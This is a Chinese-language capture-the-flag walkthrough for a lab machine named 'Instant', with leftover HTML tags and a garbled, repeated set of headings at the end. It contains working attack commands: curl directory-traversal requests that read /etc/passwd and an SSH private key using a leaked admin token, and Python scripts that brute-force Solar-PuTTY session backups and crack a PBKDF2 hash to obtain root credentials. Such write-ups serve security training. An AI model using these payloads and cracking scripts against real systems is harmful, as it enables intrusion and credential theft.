Linux渗透实战：Instant靶机渗透教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>
使用nmap进行快速端口扫描：<\/p>
nmap -sT --min-rate 10000<\/span> -p- 10.10.11.37
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

22\/tcp (SSH)<\/li>
80\/tcp (HTTP)<\/li>
多个过滤端口<\/li>
<\/ul>
1.2 详细扫描<\/h3>
对开放端口进行详细扫描：<\/p>
nmap -sTVC -O -p22,80 10.10.11.37
<\/span><\/span><\/code><\/pre>发现：<\/p>

OpenSSH 9.6p1 Ubuntu<\/li>
Apache httpd 2.4.58 (Ubuntu)<\/li>
网站标题为"Instant Wallet"<\/li>
<\/ul>
2. Web应用分析<\/h2>
2.1 网站访问<\/h3>
访问80端口发现一个下载链接，获取到instant.apk文件<\/p>
2.2 目录爆破<\/h3>
使用gobuster和ffuf进行目录和子域名爆破：<\/p>
gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-lowercase-2.3-medium.txt -u http:\/\/instant.htb\/
<\/span><\/span>
<\/span><\/span>ffuf -c -w \/usr\/share\/wordlists\/amass\/subdomains-top1mil-110000.txt -u 'http:\/\/instant.htb'<\/span> -H "Host:FUZZ.instant.htb"<\/span>
<\/span><\/span><\/code><\/pre>未发现有效信息<\/p>
3. APK文件分析<\/h2>
3.1 使用apktool解包<\/h3>
apktool d instant.apk
<\/span><\/span><\/code><\/pre>3.2 搜索关键信息<\/h3>
搜索与目标域名相关的信息：<\/p>
grep -R -i instant.htb .\/
<\/span><\/span><\/code><\/pre>发现：<\/p>

support@instant.htb<\/li>
mywalletv1.instant.htb<\/li>
swagger-ui.instant.htb<\/li>
<\/ul>
4. Swagger API利用<\/h2>
4.1 用户注册<\/h3>
curl -X POST "http:\/\/swagger-ui.instant.htb\/api\/v1\/register"<\/span> \
<\/span><\/span><\/span><\/span>-H "accept: application\/json"<\/span> \
<\/span><\/span><\/span><\/span>-H "Content-Type: application\/json"<\/span> \
<\/span><\/span><\/span><\/span>-d "{ \"email\": \"string@qq.com\", \"password\": \"redteam\", \"pin\": \"12345\", \"username\": \"redteam\"}"<\/span>
<\/span><\/span><\/code><\/pre>4.2 用户登录获取token<\/h3>
curl -X POST "http:\/\/swagger-ui.instant.htb\/api\/v1\/login"<\/span> \
<\/span><\/span><\/span><\/span>-H "accept: application\/json"<\/span> \
<\/span><\/span><\/span><\/span>-H "Content-Type: application\/json"<\/span> \
<\/span><\/span><\/span><\/span>-d "{ \"password\": \"redteam\", \"username\": \"redteam\"}"<\/span>
<\/span><\/span><\/code><\/pre>4.3 从APK中提取管理员token<\/h3>
在APK文件中搜索"authorizations"找到管理员token：<\/p>
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA
<\/code><\/pre>
5. 目录遍历漏洞利用<\/h2>
5.1 读取\/etc\/passwd<\/h3>
curl -X GET "http:\/\/swagger-ui.instant.htb\/api\/v1\/admin\/read\/log?log_file_name=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"<\/span> \
<\/span><\/span><\/span><\/span>-H "accept: application\/json"<\/span> \
<\/span><\/span><\/span><\/span>-H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"<\/span>
<\/span><\/span><\/code><\/pre>发现用户：shirohige<\/p>
5.2 读取SSH私钥<\/h3>
curl -X GET "http:\/\/swagger-ui.instant.htb\/api\/v1\/admin\/read\/log?log_file_name=..%2F..%2F..%2F..%2F..%2F..%2Fhome%2Fshirohige%2F.ssh%2Fid_rsa"<\/span> \
<\/span><\/span><\/span><\/span>-H "accept: application\/json"<\/span> \
<\/span><\/span><\/span><\/span>-H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"<\/span>
<\/span><\/span><\/code><\/pre>5.3 使用awk处理私钥<\/h3>
cat sou | awk -F'\"'<\/span> '{print $2}'<\/span> | awk -F '\'<\/span> '{print $1}'<\/span>
<\/span><\/span><\/code><\/pre>6. 建立SSH连接<\/h2>
使用获取的私钥连接SSH：<\/p>
ssh shirohige@10.10.11.37 -i id_rsa
<\/span><\/span><\/code><\/pre>7. 权限提升<\/h2>
7.1 端口转发<\/h3>
发现本地端口8888和8808：<\/p>
ssh shirohige@10.10.11.37 -i id_rsa -L 8888:127.0.0.1:8888
<\/span><\/span>ssh shirohige@10.10.11.37 -i id_rsa -L 8808:127.0.0.1:8808
<\/span><\/span><\/code><\/pre>7.2 查找备份文件<\/h3>
find \/ -name '*backup*'<\/span> 2>\/dev\/null
<\/span><\/span><\/code><\/pre>发现Solar-PuTTY会话备份文件<\/p>
7.3 解密Solar-PuTTY会话<\/h3>
使用以下Python脚本解密：<\/p>
import<\/span> base64
<\/span><\/span>import<\/span> sys
<\/span><\/span>from<\/span> Crypto.Cipher import<\/span> DES3
<\/span><\/span>from<\/span> Crypto.Protocol.KDF import<\/span> PBKDF2
<\/span><\/span>
<\/span><\/span>def<\/span> decrypt<\/span>(passphrase, ciphertext):
<\/span><\/span>    data =<\/span> ''<\/span>
<\/span><\/span>    try<\/span>:
<\/span><\/span>        # Decode the base64 encoded ciphertext<\/span>
<\/span><\/span>        array =<\/span> base64.<\/span>b64decode(ciphertext)
<\/span><\/span>        salt =<\/span> array[:24<\/span>]
<\/span><\/span>        iv =<\/span> array[24<\/span>:32<\/span>]
<\/span><\/span>        encrypted_data =<\/span> array[48<\/span>:]
<\/span><\/span>        
<\/span><\/span>        # Derive the key using PBKDF2<\/span>
<\/span><\/span>        key =<\/span> PBKDF2(passphrase, salt, dkLen=<\/span>24<\/span>, count=<\/span>1000<\/span>)
<\/span><\/span>        
<\/span><\/span>        # Create the Triple DES cipher in CBC mode<\/span>
<\/span><\/span>        cipher =<\/span> DES3.<\/span>new(key, DES3.<\/span>MODE_CBC, iv)
<\/span><\/span>        
<\/span><\/span>        # Decrypt the data<\/span>
<\/span><\/span>        decrypted_data =<\/span> cipher.<\/span>decrypt(encrypted_data)
<\/span><\/span>        
<\/span><\/span>        # Remove padding (PKCS7 padding)<\/span>
<\/span><\/span>        padding_len =<\/span> decrypted_data[-<\/span>1<\/span>]
<\/span><\/span>        decrypted_data =<\/span> decrypted_data[:-<\/span>padding_len]
<\/span><\/span>        
<\/span><\/span>        data =<\/span> ''<\/span>.<\/span>join(chr(c) for<\/span> c in<\/span> decrypted_data if<\/span> chr(c).<\/span>isascii())
<\/span><\/span>    except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>        print(f<\/span>'Error: <\/span>{<\/span>e}<\/span>'<\/span>)
<\/span><\/span>    return<\/span> data
<\/span><\/span>
<\/span><\/span>if<\/span> len(sys.<\/span>argv) <<\/span> 3<\/span>:
<\/span><\/span>    print(f<\/span>'Usage: <\/span>{<\/span>sys.<\/span>argv[0<\/span>]}<\/span> putty_session.dat wordlist.txt'<\/span>)
<\/span><\/span>    exit(1<\/span>)
<\/span><\/span>
<\/span><\/span>with<\/span> open(sys.<\/span>argv[1<\/span>]) as<\/span> f:
<\/span><\/span>    cipher =<\/span> f.<\/span>read()
<\/span><\/span>
<\/span><\/span>with<\/span> open(sys.<\/span>argv[2<\/span>]) as<\/span> passwords:
<\/span><\/span>    for<\/span> i, password in<\/span> enumerate(passwords):
<\/span><\/span>        password =<\/span> password.<\/span>strip()
<\/span><\/span>        decrypted =<\/span> decrypt(password, cipher)
<\/span><\/span>        print(f<\/span>'[<\/span>{<\/span>i}<\/span>] <\/span>{<\/span>password=}<\/span>'<\/span>, end=<\/span>'<\/span>\r<\/span>'<\/span>)
<\/span><\/span>        if<\/span> 'Credentials'<\/span> in<\/span> decrypted:
<\/span><\/span>            print(f<\/span>'<\/span>\r<\/span>[<\/span>{<\/span>i}<\/span>] <\/span>{<\/span>password=<\/span>10<\/span>}<\/span>'<\/span>)
<\/span><\/span>            print()
<\/span><\/span>            print(decrypted)
<\/span><\/span>            break<\/span>
<\/span><\/span><\/code><\/pre>执行：<\/p>
python3 exp.py sessions-backup.dat \/usr\/share\/wordlists\/rockyou.txt
<\/span><\/span><\/code><\/pre>获得root凭据：<\/p>
"Username":"root","Password":"12**24nzC!r0c%q12"
<\/code><\/pre>
7.4 数据库密码破解<\/h3>
发现PBKDF2哈希：<\/p>
pbkdf2:sha256:600000$I5bFyb0ZzD69pNX8$e9e4ea5c280e0766612295ab9bff32e5fa1de8f6cbb6586fab7ab7bc762bd978
<\/code><\/pre>
使用以下脚本破解：<\/p>
import<\/span> hashlib
<\/span><\/span>import<\/span> binascii
<\/span><\/span>import<\/span> base64
<\/span><\/span>
<\/span><\/span>def<\/span> pbkdf2_hash<\/span>(password, salt, iterations=<\/span>600000<\/span>, dklen=<\/span>32<\/span>):
<\/span><\/span>    # dklen 默认为哈希值长度<\/span>
<\/span><\/span>    hash_value =<\/span> hashlib.<\/span>pbkdf2_hmac(
<\/span><\/span>        'sha256'<\/span>,  # 使用 SHA-256 算法<\/span>
<\/span><\/span>        password.<\/span>encode('utf-8'<\/span>),
<\/span><\/span>        salt,
<\/span><\/span>        iterations,
<\/span><\/span>        dklen
<\/span><\/span>    )
<\/span><\/span>    return<\/span> hash_value
<\/span><\/span>
<\/span><\/span>def<\/span> find_matching_password<\/span>(dictionary_file, target_hash, salt, iterations=<\/span>600000<\/span>, dklen=<\/span>32<\/span>):
<\/span><\/span>    # 将目标哈希值从十六进制字符串转换为字节串<\/span>
<\/span><\/span>    target_hash_bytes =<\/span> binascii.<\/span>unhexlify(target_hash)
<\/span><\/span>    
<\/span><\/span>    with<\/span> open(dictionary_file, 'r'<\/span>, encoding=<\/span>'utf-8'<\/span>) as<\/span> file:
<\/span><\/span>        for<\/span> line in<\/span> file:
<\/span><\/span>            password =<\/span> line.<\/span>strip()  # 去除每行密码的空格或换行符<\/span>
<\/span><\/span>            hash_value =<\/span> pbkdf2_hash(password, salt, iterations, dklen)
<\/span><\/span>            if<\/span> hash_value ==<\/span> target_hash_bytes:
<\/span><\/span>                print(f<\/span>"Found password: <\/span>{<\/span>password}<\/span>"<\/span>)
<\/span><\/span>                return<\/span> password
<\/span><\/span>    
<\/span><\/span>    print("Password not found."<\/span>)
<\/span><\/span>    return<\/span> None<\/span>
<\/span><\/span>
<\/span><\/span># 解析输入数据<\/span>
<\/span><\/span>salt =<\/span> base64.<\/span>b64decode('I5bFyb0ZzD69pNX8'<\/span>)  # 解码 Base64 盐值<\/span>
<\/span><\/span>target_hash =<\/span> 'e9e4ea5c280e0766612295ab9bff32e5fa1de8f6cbb6586fab7ab7bc762bd978'<\/span>
<\/span><\/span>dictionary_file =<\/span> '\/usr\/share\/wordlists\/rockyou.txt'<\/span>  # 字典文件路径<\/span>
<\/span><\/span>
<\/span><\/span># 调用破解函数<\/span>
<\/span><\/span>find_matching_password(dictionary_file, target_hash, salt)
<\/span><\/span><\/code><\/pre>8. 总结<\/h2>

初始信息收集发现Web应用和APK文件<\/li>
APK分析发现隐藏子域名和API端点<\/li>
通过API注册用户获取基本访问权限<\/li>
从APK中提取管理员token提升权限<\/li>
利用目录遍历漏洞读取系统文件和SSH私钥<\/li>
通过SSH私钥获取初始立足点<\/li>
在系统内查找备份文件并解密获取root凭据<\/li>
尝试破解数据库密码哈希<\/li>
<\/ol>
关键点：<\/p>

APK逆向分析是突破口<\/li>
API端点发现和利用<\/li>
目录遍历漏洞利用<\/li>
Solar-PuTTY会话解密<\/li>
PBKDF2哈希破解<\/li>
<\/ul>
Linux渗透实战：Instant靶机渗透教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. Web应用分析<\/h2>

2.1 网站访问<\/h3> 访问80端口发现一个下载链接，获取到instant.apk文件<\/p>

3. APK文件分析<\/h2>

4. Swagger API利用<\/h2>

5. 目录遍历漏洞利用<\/h2>

7. 权限提升<\/h2>

2.1 网站访问<\/h3>
访问80端口发现一个下载链接，获取到instant.apk文件<\/p>
